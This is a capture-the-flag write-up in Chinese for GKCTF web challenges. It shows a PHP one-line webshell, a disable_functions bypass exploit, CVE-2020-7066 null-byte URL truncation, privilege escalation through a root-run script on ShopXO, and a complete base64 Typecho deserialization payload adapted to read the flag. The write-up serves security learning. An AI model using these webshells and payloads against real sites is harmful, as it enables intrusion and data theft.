zoukankan      html  css  js  c++  java
  • GKCTF web wp

    check in

    没有什么filter,先phpinfo();看一下,发现是7.3版本的,禁用很多函数。

    写小马,eval($_POST['cmd']),这里有点奇怪,我直接写$_POST['cmd']不行,得多写一个eval。

    连接进去以后,flag不能读,去虚拟终端执行一下readflag

    WP解释说是PHP里面禁用了相关函数,所以我们需要绕过的exp,上传至服务器目录,并执行

    下载地址:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

    百度还发现有很多版本的linux下php中的disable_function的方式

    改写pwn(/readflag),通过蚁剑上传到tmp,然后?Ginkgo=include('/tmp/exploit.php')的base64

    cve版签到

    hint:cve-2020-7066

    名称 CVE-2020-7066
    描述 在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零( 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。

    ?url=http://www.ctfhub.com

    You just view *.ctfhub.com 也就是要ctfhub.com结尾。

    好像不行,用%00截断。访问?url=http://127.0.0.1%00.ctfhub.com

    [4] => Tips: Host must be end with '123'

    把最后127.0.0.1改成127.0.0.123 出flag

    老八小超市儿

    进来先感叹一下这个做的真好。百度一下居然还有这个电商模板。

    直接百度搜索shopxo漏洞,参考[http://www.nctry.com/1660.html]

    过程不赘述了,上传小马,蚁剑连进去。

    注意里面有个错误,马的路径是/public/static/index/default/1.php

    进去以后,有个flag,是假的,说在Root里面,但是root没权限

    flag.hint好像也没什么用。这时看到一个标红的auto.sh。想改一下里面的60s改少,发现改不了。是root权限才能改。说明这个是root权限文件.

    #!/bin/sh
    while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done
    

    跟着路径找到py文件

    import os
    import io
    import time
    os.system("whoami")
    gk1=str(time.ctime())
    gk="
    Get The RooT,The Date Is Useful!"
    f=io.open("/flag.hint", "rb+")
    f.write(str(gk1))
    f.write(str(gk))
    f.close()
    

    time ctime() 函数把一个时间戳(按秒计算的浮点数)转化为time.asctime()的形式。中间无参数时,默认参数是time.time()

    这里就是写一点东西到/flag.hint里面。这个是root权限控制的py文件,那么这个也有root权限。那我们用这文件read flag然后write到flag.hint里面。
    在中间插入
    a=io.open("/root/flag","rb+")
    b=a.read()
    f.write(b)

    然后去flag.hint里面就有flag了

    EzTypecho

    给了源码

    不给我安装,百度typecho,是一个博客软件。搜索typecho 漏洞,第二个有个
    [Typecho install.php存在的反序列化漏洞分析(含EXP)]https://www.freebuf.com/vuls/155753.html

    里面有payload,直接拿现成的传POST上去

    __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjQ6IlRlc3QiOjA6e319czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6OToicGhwaW5mbygpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

    注意要GET一个start上去,

    出现回显。

    改一下exp,

    这里改为cat /flag

    上传回显成功

    这篇文章也挺好https://www.freebuf.com/sectool/152889.html

  • 相关阅读:
    二进制安装kubernetes(二) kube-apiserver组件安装
    二进制安装kubernetes(一) 环境准备及etcd组件安装及etcd管理软件etcdkeeper安装
    docker 支持systemctl start|stop|status等操作
    nginx ssl通讯优化思路
    记录一次mongodb因网络问题导致shard节点异常
    容器技术
    前端面试题2019年京东工程师面试题及答案解析
    前端面试题2019年网易工程师面试题及答案解析
    前端面试题2019年小米工程师面试题及答案解析
    PHP面试题2019年新浪工程师面试题及答案解析
  • 原文地址:https://www.cnblogs.com/vstar-o/p/12962055.html
Copyright © 2011-2022 走看看